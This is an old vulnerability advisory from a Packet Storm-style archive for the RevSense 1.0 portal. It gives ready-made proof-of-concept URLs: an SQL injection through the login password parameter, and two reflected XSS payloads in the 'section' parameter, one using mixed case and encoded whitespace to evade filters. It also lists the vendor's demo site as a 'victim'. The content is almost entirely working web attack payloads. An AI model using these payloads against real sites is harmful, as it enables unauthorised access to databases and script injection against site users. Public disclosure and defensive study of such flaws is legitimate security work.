revsense-sqlxss.txt

2008-12-04T00:00:00
ID PACKETSTORM:72596
Type packetstorm
Reporter Pouya Server
Modified 2008-12-04T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name : RevSense  
Version : 1.0  
Vendor : http://www.revsense.com  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (SQL,XSS)  
---------------------------------------------------------  
#########################################################  
[SQL]:  
http://site.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"&section=user&action=login  
  
[XSS]:  
http://site.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya  
http://site.com/index.php?section=<script>alert(1369)</script>&action=login  
  
  
---------------------------------  
  
Victem :  
http://demo.revsense.com  
`